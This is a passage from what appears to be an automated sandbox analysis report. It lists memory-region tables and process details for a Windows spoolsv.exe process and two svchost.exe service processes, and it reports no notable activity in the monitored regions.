| pagefile_0x00000000008d0000 | 0x008d0000 | 0x008e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00933fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00940fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x00951fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x0099ffff | Private Memory | rw |
|
|
|
- |
| spoolsv.exe.mui | 0x009a0000 | 0x009a0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x009b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x009c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x009d6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x009e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00af0000 | 0x00badfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x00d37fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d40000 | 0x00d40000 | 0x00ec0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ed0000 | 0x00ed0000 | 0x00f8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f90000 | 0x00f90000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x0104ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001050000 | 0x01050000 | 0x01056fff | Private Memory | rw |
|
|
|
- |
| localspl.dll.mui | 0x01060000 | 0x01073fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001080000 | 0x01080000 | 0x0108ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010d0000 | 0x010d0000 | 0x0110ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x0115ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01160000 | 0x01496fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000014a0000 | 0x014a0000 | 0x0159ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000015a0000 | 0x015a0000 | 0x015a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| wsdmon.dll.mui | 0x015b0000 | 0x015b0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000015c0000 | 0x015c0000 | 0x015c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000015d0000 | 0x015d0000 | 0x015d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000015e0000 | 0x015e0000 | 0x016dffff | Private Memory | rw |
|
|
|
- |
| msxml6r.dll | 0x016e0000 | 0x016e0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000016f0000 | 0x016f0000 | 0x016f6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001700000 | 0x01700000 | 0x0173ffff | Private Memory | rw |
|
|
|
- |
| win32spl.dll.mui | 0x01740000 | 0x01740fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001750000 | 0x01750000 | 0x0175ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x01760000 | 0x0183efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001840000 | 0x01840000 | 0x0193ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001940000 | 0x01940000 | 0x01b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b40000 | 0x01b40000 | 0x01b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b80000 | 0x01b80000 | 0x01bbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bc0000 | 0x01bc0000 | 0x01bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c00000 | 0x01c00000 | 0x01c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cc0000 | 0x01cc0000 | 0x01cfffff | Private Memory | rw |
|
|
|
- |
| inetpp.dll.mui | 0x01d00000 | 0x01d00fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df5ffcb0000 | 0x7df5ffcb0000 | 0x7ff5ffcaffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6fc80a000 | 0x7ff6fc80a000 | 0x7ff6fc80bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc80e000 | 0x7ff6fc80e000 | 0x7ff6fc80ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc810000 | 0x7ff6fc810000 | 0x7ff6fc811fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc812000 | 0x7ff6fc812000 | 0x7ff6fc813fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc814000 | 0x7ff6fc814000 | 0x7ff6fc815fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc816000 | 0x7ff6fc816000 | 0x7ff6fc817fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc818000 | 0x7ff6fc818000 | 0x7ff6fc819fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc81c000 | 0x7ff6fc81c000 | 0x7ff6fc81dfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6fc820000 | 0x7ff6fc820000 | 0x7ff6fc91ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6fc920000 | 0x7ff6fc920000 | 0x7ff6fc942fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6fc944000 | 0x7ff6fc944000 | 0x7ff6fc944fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc946000 | 0x7ff6fc946000 | 0x7ff6fc947fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc948000 | 0x7ff6fc948000 | 0x7ff6fc949fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc94a000 | 0x7ff6fc94a000 | 0x7ff6fc94bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc94c000 | 0x7ff6fc94c000 | 0x7ff6fc94dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6fc94e000 | 0x7ff6fc94e000 | 0x7ff6fc94ffff | Private Memory | rw |
|
|
|
- |
| spoolsv.exe | 0x7ff6fd6e0000 | 0x7ff6fd7a4fff | Memory Mapped File | rwx |
|
|
|
- |
| inetpp.dll | 0x7ff8d5810000 | 0x7ff8d583dfff | Memory Mapped File | rwx |
|
|
|
- |
| win32spl.dll | 0x7ff8d5840000 | 0x7ff8d5911fff | Memory Mapped File | rwx |
|
|
|
- |
| drvstore.dll | 0x7ff8d5920000 | 0x7ff8d59f2fff | Memory Mapped File | rwx |
|
|
|
- |
| fdpnp.dll | 0x7ff8d5a00000 | 0x7ff8d5a12fff | Memory Mapped File | rwx |
|
|
|
- |
| fundisc.dll | 0x7ff8d5a20000 | 0x7ff8d5a49fff | Memory Mapped File | rwx |
|
|
|
- |
| webservices.dll | 0x7ff8d5a50000 | 0x7ff8d5bcafff | Memory Mapped File | rwx |
|
|
|
- |
| wsdapi.dll | 0x7ff8d5bd0000 | 0x7ff8d5c76fff | Memory Mapped File | rwx |
|
|
|
- |
| wsdmon.dll | 0x7ff8d5c80000 | 0x7ff8d5d13fff | Memory Mapped File | rwx |
|
|
|
- |
| usbmon.dll | 0x7ff8d5d20000 | 0x7ff8d5d6efff | Memory Mapped File | rwx |
|
|
|
- |
| wsnmp32.dll | 0x7ff8d5d70000 | 0x7ff8d5d83fff | Memory Mapped File | rwx |
|
|
|
- |
| tcpmon.dll | 0x7ff8d5db0000 | 0x7ff8d5de9fff | Memory Mapped File | rwx |
|
|
|
- |
| localspl.dll | 0x7ff8d5f30000 | 0x7ff8d6045fff | Memory Mapped File | rwx |
|
|
|
- |
| fxsmon.dll | 0x7ff8d6600000 | 0x7ff8d6610fff | Memory Mapped File | rwx |
|
|
|
- |
| printisolationproxy.dll | 0x7ff8d6620000 | 0x7ff8d6633fff | Memory Mapped File | rwx |
|
|
|
- |
| spoolss.dll | 0x7ff8da820000 | 0x7ff8da83bfff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x7ff8da840000 | 0x7ff8da8c3fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7ff8e05b0000 | 0x7ff8e05c1fff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x7ff8e1c70000 | 0x7ff8e1ee6fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7ff8e2ea0000 | 0x7ff8e2ea9fff | Memory Mapped File | rwx |
|
|
|
- |
| winprint.dll | 0x7ff8e3010000 | 0x7ff8e301ffff | Memory Mapped File | rwx |
|
|
|
- |
| sfc_os.dll | 0x7ff8e3020000 | 0x7ff8e3030fff | Memory Mapped File | rwx |
|
|
|
- |
| deviceassociation.dll | 0x7ff8e3150000 | 0x7ff8e315ffff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ff8e5480000 | 0x7ff8e548bfff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ff8e5dd0000 | 0x7ff8e5ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ff8e6330000 | 0x7ff8e6365fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ff8e7160000 | 0x7ff8e71c7fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7ff8e8070000 | 0x7ff8e808dfff | Memory Mapped File | rwx |
|
|
|
- |
| snmpapi.dll | 0x7ff8e8260000 | 0x7ff8e826bfff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ff8e8460000 | 0x7ff8e846afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ff8e8480000 | 0x7ff8e84b7fff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x7ff8e84d0000 | 0x7ff8e84d9fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ff8e8ad0000 | 0x7ff8e8ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ff8e9ae0000 | 0x7ff8e9b11fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ff8e9b20000 | 0x7ff8e9ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ff8e9cd0000 | 0x7ff8e9cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ff8ea000000 | 0x7ff8ea00bfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ff8ea010000 | 0x7ff8ea035fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ff8ea3c0000 | 0x7ff8ea467fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ff8ea5c0000 | 0x7ff8ea61cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ff8ea820000 | 0x7ff8ea877fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ff8eae50000 | 0x7ff8eaea3fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ff8eafb0000 | 0x7ff8eb170fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7ff8ebbf0000 | 0x7ff8ebdb4fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ff8ec300000 | 0x7ff8ec440fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ff8ee040000 | 0x7ff8ee0a8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ff8ee250000 | 0x7ff8ee257fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #73: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #73 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k WbioSvcGroup |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x428 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
BFC
0x
440
0x
438
0x
434
0x
42C
0x
7A0
0x
A78
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000050714f0000 | 0x50714f0000 | 0x50714fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| wbiosrvc.dll.mui | 0x5071500000 | 0x5071505fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005071510000 | 0x5071510000 | 0x5071523fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005071530000 | 0x5071530000 | 0x50715affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000050715b0000 | 0x50715b0000 | 0x50715b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000050715c0000 | 0x50715c0000 | 0x50715c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000050715d0000 | 0x50715d0000 | 0x50715d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x50715e0000 | 0x507169dfff | Memory Mapped File | r |
|
|
|
- |
| winbiostorageadapter.dll.mui | 0x50716a0000 | 0x50716a0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000050716b0000 | 0x50716b0000 | 0x50716b6fff | Private Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x50716c0000 | 0x50716c0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000050716d0000 | 0x50716d0000 | 0x50716d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000050716e0000 | 0x50716e0000 | 0x50716e0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005071700000 | 0x5071700000 | 0x50717fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005071800000 | 0x5071800000 | 0x507187ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005071880000 | 0x5071880000 | 0x507197ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005071980000 | 0x5071980000 | 0x5071a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005071a80000 | 0x5071a80000 | 0x5071b7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005071b80000 | 0x5071b80000 | 0x5071c3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005071c60000 | 0x5071c60000 | 0x5071c66fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005071d00000 | 0x5071d00000 | 0x5071dfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005071e00000 | 0x5071e00000 | 0x5071f87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005071f90000 | 0x5071f90000 | 0x5072110fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005072120000 | 0x5072120000 | 0x507221ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005072220000 | 0x5072220000 | 0x507231ffff | Private Memory | rw |
|
|
|
- |
| oleaut32.dll | 0x5072320000 | 0x50723dcfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff220000 | 0x7df5ff220000 | 0x7ff5ff21ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff67355c000 | 0x7ff67355c000 | 0x7ff67355dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67355e000 | 0x7ff67355e000 | 0x7ff67355ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff673560000 | 0x7ff673560000 | 0x7ff67365ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff673660000 | 0x7ff673660000 | 0x7ff673682fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff673684000 | 0x7ff673684000 | 0x7ff673685fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673686000 | 0x7ff673686000 | 0x7ff673687fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673688000 | 0x7ff673688000 | 0x7ff673689fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67368a000 | 0x7ff67368a000 | 0x7ff67368bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67368c000 | 0x7ff67368c000 | 0x7ff67368dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67368e000 | 0x7ff67368e000 | 0x7ff67368efff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff673b40000 | 0x7ff673b4cfff | Memory Mapped File | rwx |
|
|
|
- |
| rtworkq.dll | 0x7ff8e6440000 | 0x7ff8e646ffff | Memory Mapped File | rwx |
|
|
|
- |
| mfplat.dll | 0x7ff8e6470000 | 0x7ff8e657bfff | Memory Mapped File | rwx |
|
|
|
- |
| nuivoicewbsadapters.dll | 0x7ff8e6580000 | 0x7ff8e65eafff | Memory Mapped File | rwx |
|
|
|
- |
| winbiostorageadapter.dll | 0x7ff8e65f0000 | 0x7ff8e65fafff | Memory Mapped File | rwx |
|
|
|
- |
| facerecognitionengineadapter.dll | 0x7ff8e6600000 | 0x7ff8e6635fff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7ff8e6640000 | 0x7ff8e6b84fff | Memory Mapped File | rwx |
|
|
|
- |
| facerecognitionsensoradapter.dll | 0x7ff8e6b90000 | 0x7ff8e6bc0fff | Memory Mapped File | rwx |
|
|
|
- |
| winbioext.dll | 0x7ff8e6c20000 | 0x7ff8e6c27fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7ff8e6c30000 | 0x7ff8e6d21fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp_win.dll | 0x7ff8e6d30000 | 0x7ff8e6dcafff | Memory Mapped File | rwx |
|
|
|
- |
| wbiosrvc.dll | 0x7ff8e6dd0000 | 0x7ff8e6e69fff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ff8e75b0000 | 0x7ff8e75bafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ff8ea1d0000 | 0x7ff8ea1d9fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ff8eafb0000 | 0x7ff8eb170fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ff8ec300000 | 0x7ff8ec440fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #74: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #74 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x444 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
748
0x
730
0x
70C
0x
6E8
0x
6E4
0x
6B0
0x
650
0x
554
0x
550
0x
52C
0x
518
0x
514
0x
50C
0x
500
0x
4E4
0x
4C8
0x
4C4
0x
4BC
0x
4B8
0x
4B0
0x
4A8
0x
4A4
0x
4A0
0x
49C
0x
48C
0x
448
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000b100000000 | 0xb100000000 | 0xb1000fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b100100000 | 0xb100100000 | 0xb1001fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b100200000 | 0xb100200000 | 0xb1002fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b175140000 | 0xb175140000 | 0xb17514ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xb175150000 | 0xb175150fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b175160000 | 0xb175160000 | 0xb175173fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b175180000 | 0xb175180000 | 0xb1751fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b175200000 | 0xb175200000 | 0xb175203fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b175210000 | 0xb175210000 | 0xb175210fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b175220000 | 0xb175220000 | 0xb175221fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b175230000 | 0xb175230000 | 0xb175230fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b175240000 | 0xb175240000 | 0xb175240fff | Private Memory | rw |
|
|
|
- |
| bfe.dll.mui | 0xb175250000 | 0xb175256fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b175260000 | 0xb175260000 | 0xb175266fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b175270000 | 0xb175270000 | 0xb17527ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b175280000 | 0xb175280000 | 0xb175286fff | Private Memory | rw |
|
|
|
- |
| firewallapi.dll.mui | 0xb175290000 | 0xb1752b3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b1752c0000 | 0xb1752c0000 | 0xb1752c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b1752d0000 | 0xb1752d0000 | 0xb1752d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b1752e0000 | 0xb1752e0000 | 0xb1752e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b1752f0000 | 0xb1752f0000 | 0xb1752f7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b175300000 | 0xb175300000 | 0xb1753fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xb175400000 | 0xb1754bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b1754c0000 | 0xb1754c0000 | 0xb1754c1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b175540000 | 0xb175540000 | 0xb1755fffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b175600000 | 0xb175600000 | 0xb1756fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b175700000 | 0xb175700000 | 0xb175887fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b175890000 | 0xb175890000 | 0xb175a10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b175a20000 | 0xb175a20000 | 0xb175b1ffff | Private Memory | rw |
|
|
|
- |
| firewallapi.dll | 0xb175b20000 | 0xb175b9cfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b175ba0000 | 0xb175ba0000 | 0xb175ba1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b175bb0000 | 0xb175bb0000 | 0xb175bb0fff | Private Memory | rw |
|
|
|
